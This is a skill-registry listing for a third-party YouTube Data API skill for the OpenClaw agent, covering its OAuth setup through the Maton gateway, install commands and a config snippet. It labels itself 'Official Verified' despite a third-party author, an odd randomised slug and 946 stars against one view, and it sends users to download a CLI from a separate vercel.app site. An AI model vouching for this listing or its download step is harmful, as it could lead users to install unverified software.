ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube

YouTube Data API integration with managed OAuth. Search videos, manage playlists, access channel data, and interact with comments. Use this skill when users want to interact with YouTube. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).

Why use this skill?

Integrate YouTube Data API with your OpenClaw AI agent. Search videos, manage playlists, and automate your channel interactions securely using managed OAuth.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/thiagoruss0/youtube37puq
Or

What This Skill Does

The YouTube skill for OpenClaw provides a powerful, abstracted interface to the YouTube Data API v3. It enables users to perform complex interactions with their YouTube account directly through the OpenClaw AI agent. By handling the complexities of Google's OAuth authentication flow through the Maton gateway, this skill allows for seamless programmatic control over YouTube resources. Users can search for public video content, manage their private playlists, retrieve detailed channel statistics, and interact with community engagement features like video comments and subscriptions. It acts as a secure proxy, ensuring that your authentication tokens are managed centrally while your agent executes requested tasks.

Installation

To utilize this skill, you must first ensure the OpenClawCLI is installed on your system, which can be acquired at https://openclawcli.vercel.app/. Once the CLI is ready, execute the installation command: clawhub install openclaw/skills/skills/thiagoruss0/youtube37puq. Following the installation, ensure that you have a registered account at maton.ai and that you have exported your API key as an environment variable: export MATON_API_KEY="YOUR_API_KEY". Finally, you will need to initialize your connection by POSTing to the control endpoint, which provides a unique authorization URL. Opening this URL in your browser completes the Google OAuth handshake.

Use Cases

This skill is designed for automation power users and developers. Common use cases include automating the organization of watch-later queues based on AI-filtered search results, managing video metadata for content creators, monitoring channel analytics, and performing bulk comment moderation or responses. It is particularly useful for workflows involving multi-platform content distribution where updating YouTube information is part of a larger, multi-step automated process.

Example Prompts

  1. "Search for the latest tutorials on Python programming and add the top 3 results to my 'Learn to Code' playlist."
  2. "Get the current subscriber count and latest video performance metrics for my channel."
  3. "Find all comments on my latest video that contain the word 'tutorial' and flag them for my review."

Tips & Limitations

Always ensure your MATON_API_KEY is kept secure and never committed to version control systems. Be aware that YouTube enforces strict API quotas; frequent bulk requests may trigger rate limiting. If you encounter authentication issues, verify your connection status at https://ctrl.maton.ai. Note that some sensitive operations may require elevated Google OAuth scopes; if you receive an 'insufficient permissions' error, you may need to re-authorize the connection via the provided management URL.

Metadata

Stars946
Views1
Updated2026-02-13
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-thiagoruss0-youtube37puq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#youtube#automation#api#video-management#oauth
Safety Score: 4/5

Flags: network-access, external-api